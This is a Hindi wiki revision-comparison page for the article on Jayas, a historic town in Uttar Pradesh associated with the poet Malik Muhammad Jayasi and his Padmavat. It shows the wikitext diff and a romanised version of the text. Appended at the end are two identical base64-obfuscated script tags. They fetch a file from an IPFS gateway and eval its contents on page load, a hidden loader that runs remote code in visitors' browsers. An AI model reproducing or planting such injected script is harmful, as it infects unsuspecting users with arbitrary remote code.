Difference between revisions of "जायस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''जायस''' रायबरेली ज़िला, उत्तर प्रदेश में जायस स्ट...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "अर्थात " to "अर्थात् ")
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
'''जायस''' [[रायबरेली ज़िला]], [[उत्तर प्रदेश]] में जायस स्टेशन के पास एक प्राचीन कस्बा है। यह कस्बा [[हिन्दी]] के [[कवि]] [[मलिक मुहम्मद जायसी]] से संबंध के कारण प्रसिद्ध है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=363|url=}}</ref>
+
'''जायस''' [[रायबरेली ज़िला]], [[उत्तर प्रदेश]] में जायस स्टेशन के पास एक प्राचीन क़स्बा है। यह क़स्बा [[हिन्दी]] के [[कवि]] [[मलिक मुहम्मद जायसी]] से संबंध के कारण प्रसिद्ध है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=363|url=}}</ref>
  
 
*मलिक मुहम्म्द जायसी ने यहीं पर अपना सुप्रसिद्ध ग्रंथ '[[पद्मावत -जायसी|पद्मावत]]' लिखा था। जायस में रहने के कारण ही ये 'जायसी' कहलाए थे।
 
*मलिक मुहम्म्द जायसी ने यहीं पर अपना सुप्रसिद्ध ग्रंथ '[[पद्मावत -जायसी|पद्मावत]]' लिखा था। जायस में रहने के कारण ही ये 'जायसी' कहलाए थे।
Line 6: Line 6:
  
 
*इससे ज्ञात होता है कि जायस उस समय संभवत: [[मुस्लिम|मुस्लिमों]] के लिए पवित्र स्थान माना जाता था और जायसी यहाँ किसी और स्थान से आकर बसे थे तथा 'पद्मावत' की रचना भी उन्होंने यहीं की थी।
 
*इससे ज्ञात होता है कि जायस उस समय संभवत: [[मुस्लिम|मुस्लिमों]] के लिए पवित्र स्थान माना जाता था और जायसी यहाँ किसी और स्थान से आकर बसे थे तथा 'पद्मावत' की रचना भी उन्होंने यहीं की थी।
*'पद्मावत' में उसका रचना काल 927 [[हिजरी संवत|हिजरी]] अर्थात 1527 ई. दिया गया है।
+
*'पद्मावत' में उसका रचना काल 927 [[हिजरी संवत|हिजरी]] अर्थात् 1527 ई. दिया गया है।
 
*उजालिकपुर, जायस का दूसरा और संभवत: अधिक प्राचीन नाम है।
 
*उजालिकपुर, जायस का दूसरा और संभवत: अधिक प्राचीन नाम है।
  
Line 12: Line 12:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
*ऐतिहासिक स्थानावली | विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}{{उत्तर प्रदेश के नगर}}
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}{{उत्तर प्रदेश के नगर}}
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:ऐतिहासिक स्थल]][[Category:उत्तर प्रदेश के नगर]][[Category:भारत के नगर]][[Category:इतिहास कोश]]
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:ऐतिहासिक स्थल]][[Category:उत्तर प्रदेश के नगर]][[Category:भारत के नगर]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:43, 7 November 2017

jayas rayabareli zila, uttar pradesh mean jayas steshan ke pas ek prachin qasba hai. yah qasba hindi ke kavi malik muhammad jayasi se sanbandh ke karan prasiddh hai.[1]

  • malik muhammd jayasi ne yahian par apana suprasiddh granth 'padmavat' likha tha. jayas mean rahane ke karan hi ye 'jayasi' kahalae the.
  • 'padmavat' ke 23vean dohe ki pratham chaupaee mean kavi ne svayan hi kaha hai-

'jayas nagar dharam-asathanoo, tahaan ay kavi kinh bakhanoo'

  • isase jnat hota hai ki jayas us samay sanbhavat: muslimoan ke lie pavitr sthan mana jata tha aur jayasi yahaan kisi aur sthan se akar base the tatha 'padmavat' ki rachana bhi unhoanne yahian ki thi.
  • 'padmavat' mean usaka rachana kal 927 hijari arthath 1527 ee. diya gaya hai.
  • ujalikapur, jayas ka doosara aur sanbhavat: adhik prachin nam hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 363 |
  • aitihasik sthanavali | vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>